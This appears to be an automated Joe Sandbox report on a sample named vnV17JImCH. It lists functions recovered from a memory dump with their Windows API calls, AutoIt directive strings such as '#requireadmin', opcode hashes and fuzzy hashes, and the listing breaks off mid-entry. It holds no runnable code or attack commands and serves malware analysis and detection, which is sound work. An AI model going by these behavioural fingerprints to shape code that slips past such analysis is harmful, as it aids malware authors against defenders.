Function 00F00F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00F00F8C
GetKeyboardState.USER32(?), ref: 00F00FA1
SetKeyboardState.USER32(?), ref: 00F01002
PostMessageW.USER32(?,00000101,00000010,?), ref: 00F01030
PostMessageW.USER32(?,00000101,00000011,?), ref: 00F0104F
PostMessageW.USER32(?,00000101,00000012,?), ref: 00F01095
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00F010B8

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 8bf6e46d8b0a26aa7f46512850cd3a720f2fc0fa728dd6d0974c9ad7cdcdcae5
Instruction ID: 3fe62398c678d8e5ba9f6b172eadc43adbd5a664d47c7e15b3a7dcdfdbfd457e
Opcode Fuzzy Hash: 8bf6e46d8b0a26aa7f46512850cd3a720f2fc0fa728dd6d0974c9ad7cdcdcae5
Instruction Fuzzy Hash: 56510560A047D63DFB3643348C05BBABFA9AB06314F088589E1D5868C3C6E8DCC8F751

Function 00F00D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00F00DA5
GetKeyboardState.USER32(?), ref: 00F00DBA
SetKeyboardState.USER32(?), ref: 00F00E1B
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00F00E47
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00F00E64
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00F00EA8
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00F00EC9

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: dc60db8995f077f20c3dcecb5f6b83533238ba2a539c47e78cd563c0c6920b3e
Instruction ID: 7406a075c0d0411abca33e6655e91c7b551bb9f6d939181e566ca360a1205e2a
Opcode Fuzzy Hash: dc60db8995f077f20c3dcecb5f6b83533238ba2a539c47e78cd563c0c6920b3e
Instruction Fuzzy Hash: CC5107A09187D63DFB328374CC45B7ABFA9AB06310F088899F1D4564C2CB95EC98F760

Function 00F055FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00F0560A
_wcsncpy.LIBCMT ref: 00F0563F
_wcsncpy.LIBCMT ref: 00F05671
_wcsncpy.LIBCMT ref: 00F056A4
_wcsncpy.LIBCMT ref: 00F056E6
_wcsncpy.LIBCMT ref: 00F05720
_wcsncpy.LIBCMT ref: 00F0574F

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: 2dba997da66c48532f8b2b0628427b758f62e59bdae6e1cc2318e62f5150ba09
Instruction ID: 4a23db9ad5214887ad67aa6457a7bacf8dd6e901b06b9d68dbd6551d019faaad
Opcode Fuzzy Hash: 2dba997da66c48532f8b2b0628427b758f62e59bdae6e1cc2318e62f5150ba09
Instruction Fuzzy Hash: ED41D865C5031876CB11EBB48C46ECFB7F89F04310F50945AE604F3161FB35A646D7AA

Function 00F03671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00F0466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F03697,?), ref: 00F0468B

Part of subcall function 00F0466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00F03697,?), ref: 00F046A4

lstrcmpiW.KERNEL32(?,?), ref: 00F036B7
_wcscmp.LIBCMT ref: 00F036D3
MoveFileW.KERNEL32(?,?), ref: 00F036EB
_wcscat.LIBCMT ref: 00F03733
SHFileOperationW.SHELL32(?), ref: 00F0379F

Strings

\*.*, xrefs: 00F0372D

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: 4cda3e2a954295e5f4fa135885cc5a77d32f091c9f3717360de4db7b0a9c31e2
Instruction ID: 18b9ddb0aca94a937f92dcbe763985337d5ea160dee083d36ebcec2d7576fdd6
Opcode Fuzzy Hash: 4cda3e2a954295e5f4fa135885cc5a77d32f091c9f3717360de4db7b0a9c31e2
Instruction Fuzzy Hash: A941C3B2508344AEC751EF64C841EDFB7ECAF89390F00082EB489C3291EA35D689E752

Function 00F27291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F272AA
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F27351
IsMenu.USER32(?), ref: 00F27369
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00F273B1
DrawMenuBar.USER32 ref: 00F273C4

Strings

0, xrefs: 00F2729E

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: 65d08f0fea4acebed4e921a63b4207d980761d10cda16413c21fd46b8ebaffe0
Instruction ID: cbc58dfc2f0eaff857bd05eda453a96a7ce4c4c636d1d2816062f1d09ad54876
Opcode Fuzzy Hash: 65d08f0fea4acebed4e921a63b4207d980761d10cda16413c21fd46b8ebaffe0
Instruction Fuzzy Hash: D0413775A05319EFDB20EF50E984A9ABBF8FB08320F148429FD55AB250D730AD54EF50

Function 00F20FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00F20FD4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F20FFE
FreeLibrary.KERNEL32(00000000), ref: 00F210B5

Part of subcall function 00F20FA5: RegCloseKey.ADVAPI32(?), ref: 00F2101B
Part of subcall function 00F20FA5: FreeLibrary.KERNEL32(?), ref: 00F2106D
Part of subcall function 00F20FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00F21090

RegDeleteKeyW.ADVAPI32(?,?), ref: 00F21058

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: 2a29dee37f02db6047f5cf2cfc92a7311514c0f3db076ac9360156e1cc94c334
Instruction ID: 80b4591e1e4598cac65aec282d82380388de1a95b7b8f95911bf2cbbe844f575
Opcode Fuzzy Hash: 2a29dee37f02db6047f5cf2cfc92a7311514c0f3db076ac9360156e1cc94c334
Instruction Fuzzy Hash: D431ED71D11119BFDB25DF90EC89EFFB7BCEF18310F000179E512A2151EA749E89AAA4

Function 00F262CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00F262EC
GetWindowLongW.USER32(016B5DA8,000000F0), ref: 00F2631F
GetWindowLongW.USER32(016B5DA8,000000F0), ref: 00F26354
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00F26386
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00F263B0
GetWindowLongW.USER32(00000000,000000F0), ref: 00F263C1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00F263DB

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: dda28ca993160cd32baf74992c13926d46f3a3ede9180fc687092e0f71c765eb
Instruction ID: 18edb9f419ab91296ea73d0022135c03b9ad7a127cab199830cd9d2dcdd750e7
Opcode Fuzzy Hash: dda28ca993160cd32baf74992c13926d46f3a3ede9180fc687092e0f71c765eb
Instruction Fuzzy Hash: C1311231A40264AFEB20CF28EC84F553BE1FB4A724F1901A4F551DF2B2CB71AC44AB91

Function 00EFDAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00EFDB2E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00EFDB54
SysAllocString.OLEAUT32(00000000), ref: 00EFDB57
SysAllocString.OLEAUT32(?), ref: 00EFDB75
SysFreeString.OLEAUT32(?), ref: 00EFDB7E
StringFromGUID2.OLE32(?,?,00000028), ref: 00EFDBA3
SysAllocString.OLEAUT32(?), ref: 00EFDBB1

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: f8b2d8aa380107d8922ad0aad9961743b97856ac7c8fb4fcf88e845dff9400c1
Instruction ID: 52b8a64373b5a111c70c2749205d4ad18c00fe2d2830d9ccc9d4f67210a27f71
Opcode Fuzzy Hash: f8b2d8aa380107d8922ad0aad9961743b97856ac7c8fb4fcf88e845dff9400c1
Instruction Fuzzy Hash: A021923660421DAFDF10EFA8DC88DBB77ADEB09364B018575FA14EB250D6709C469760

Function 00F16173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00F17D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00F17DB6

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00F161C6
WSAGetLastError.WSOCK32(00000000), ref: 00F161D5
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00F1620E
connect.WSOCK32(00000000,?,00000010), ref: 00F16217
WSAGetLastError.WSOCK32 ref: 00F16221
closesocket.WSOCK32(00000000), ref: 00F1624A
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00F16263

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: 63b2e983aefcb1103f6e0e3989f3314cefe9f312b3f51a2791ec7297009f7394
Instruction ID: 9300b4679fb36db6a60c6419dc41265fe7159cda79e86b79f222f2bc7ec42057
Opcode Fuzzy Hash: 63b2e983aefcb1103f6e0e3989f3314cefe9f312b3f51a2791ec7297009f7394
Instruction Fuzzy Hash: 39318131600118ABDF10AF64CC85BFE7BB9EB45760F044029FD05EB291DB74AD45ABA1

Function 00EFF65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00EFF671
__wcsnicmp.LIBCMT ref: 00EFF692
__wcsnicmp.LIBCMT ref: 00EFF6AC

Strings

#notrayicon, xrefs: 00EFF669
#requireadmin, xrefs: 00EFF68C
#OnAutoItStartRegister, xrefs: 00EFF6A6

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: a0c5acd5014018a14d4bdf24a79e6d54f2d70d78682a4c07451c60232e5bc8c4
Instruction ID: c75d9394a01557c5dac5d36874595ab0863c2f21ee9b227cccb9a915394d00f2
Opcode Fuzzy Hash: a0c5acd5014018a14d4bdf24a79e6d54f2d70d78682a4c07451c60232e5bc8c4
Instruction Fuzzy Hash: 6A2179722141156AC220BA34AC03FB7B3D8EF55358F14603AF641F6091EF91AE42D2D5

Function 00EFDBC4 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00EFDC09
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00EFDC2F
SysAllocString.OLEAUT32(00000000), ref: 00EFDC32
SysAllocString.OLEAUT32 ref: 00EFDC53
SysFreeString.OLEAUT32 ref: 00EFDC5C
StringFromGUID2.OLE32(?,?,00000028), ref: 00EFDC76
SysAllocString.OLEAUT32(?), ref: 00EFDC84

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 497e01fea2070bb039454e0027ee140819cf8eddad73e69879e74cda1581e368
Instruction ID: c2c3cc2b06f3e8958d1f5271b93c07c11af1a042a367bec558a758ae5ff352bc
Opcode Fuzzy Hash: 497e01fea2070bb039454e0027ee140819cf8eddad73e69879e74cda1581e368
Instruction Fuzzy Hash: FD218635608208AF9B10EFA8DC88DBBBBEDEB09360B118135FA14DB260D6B0DD45D764

Function 00F275CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00EA1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00EA1D73
Part of subcall function 00EA1D35: GetStockObject.GDI32(00000011), ref: 00EA1D87
Part of subcall function 00EA1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00EA1D91

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00F27632
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00F2763F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00F2764A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00F27659
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00F27665

Strings

Msctls_Progress32, xrefs: 00F27603

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: c2585e2f70595d14ef5b01cef74cbdc231e55d7703ab8437d0782f492371ed17
Instruction ID: f40bf2f8f5c604a6c9890c102c526b167a228df92767d47ef4d16ffe5399d7c1
Opcode Fuzzy Hash: c2585e2f70595d14ef5b01cef74cbdc231e55d7703ab8437d0782f492371ed17
Instruction Fuzzy Hash: 8E11B6B211022DBFEF159F64DC85EE77F6DEF08798F014114BA04A6050CB729C21EBA4

Function 00EC9AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 00EC9AE6

Part of subcall function 00EC3187: EncodePointer.KERNEL32(00000000), ref: 00EC318A
Part of subcall function 00EC3187: __initp_misc_winsig.LIBCMT ref: 00EC31A5
Part of subcall function 00EC3187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00EC9EA0
Part of subcall function 00EC3187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00EC9EB4
Part of subcall function 00EC3187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00EC9EC7
Part of subcall function 00EC3187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00EC9EDA
Part of subcall function 00EC3187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00EC9EED
Part of subcall function 00EC3187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00EC9F00
Part of subcall function 00EC3187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00EC9F13
Part of subcall function 00EC3187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00EC9F26
Part of subcall function 00EC3187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00EC9F39
Part of subcall function 00EC3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00EC9F4C
Part of subcall function 00EC3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00EC9F5F
Part of subcall function 00EC3187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00EC9F72
Part of subcall function 00EC3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00EC9F85
Part of subcall function 00EC3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00EC9F98
Part of subcall function 00EC3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00EC9FAB
Part of subcall function 00EC3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00EC9FBE

__mtinitlocks.LIBCMT ref: 00EC9AEB
__mtterm.LIBCMT ref: 00EC9AF4

Part of subcall function 00EC9B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00EC9AF9,00EC7CD0,00F5A0B8,00000014), ref: 00EC9C56
Part of subcall function 00EC9B5C: _free.LIBCMT ref: 00EC9C5D
Part of subcall function 00EC9B5C: DeleteCriticalSection.KERNEL32(00F5EC00,?,?,00EC9AF9,00EC7CD0,00F5A0B8,00000014), ref: 00EC9C7F

__calloc_crt.LIBCMT ref: 00EC9B19
__initptd.LIBCMT ref: 00EC9B3B
GetCurrentThreadId.KERNEL32 ref: 00EC9B42

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 3567560977-0
Opcode ID: 99852038d09b04cf9c13471a13bde0081318a92cb1588ba99f7bbd6a77e41789
Instruction ID: e2d4b6e4b35fd2f19c1f2b886ee04cb6f699eb5ca07d8400cf536d9573a483b3
Opcode Fuzzy Hash: 99852038d09b04cf9c13471a13bde0081318a92cb1588ba99f7bbd6a77e41789
Instruction Fuzzy Hash: 87F0C23211931129E6347A747E0BF4A3AD09F02734B20261EF414F51D3EF23990305A4

Function 00EC406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00EC3F85), ref: 00EC4085
GetProcAddress.KERNEL32(00000000), ref: 00EC408C
EncodePointer.KERNEL32(00000000), ref: 00EC4097
DecodePointer.KERNEL32(00EC3F85), ref: 00EC40B2

Strings

combase.dll, xrefs: 00EC4080
RoUninitialize, xrefs: 00EC4074

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: d82578310d35c704de13b1d3e428ddd07f49635b0db4a3c2acb37bcae32fabcc
Instruction ID: b2f8cf5f04ef6aed290159bdd2c0d402c9c16456397d3aa75f53bb7b65fac19c
Opcode Fuzzy Hash: d82578310d35c704de13b1d3e428ddd07f49635b0db4a3c2acb37bcae32fabcc
Instruction Fuzzy Hash: 47E09A70991208EBEA609F61ED09B053AB4B705756F105039F511E51E0CBB78615FA16

Function 00F064B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00F0660B
_memmove.LIBCMT ref: 00F06546

Part of subcall function 00EA9837: __itow.LIBCMT ref: 00EA9862
Part of subcall function 00EA9837: __swprintf.LIBCMT ref: 00EA98AC

_memmove.LIBCMT ref: 00F065B9
_memmove.LIBCMT ref: 00F066A0
_memmove.LIBCMT ref: 00F066B9
_memmove.LIBCMT ref: 00F066D5

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
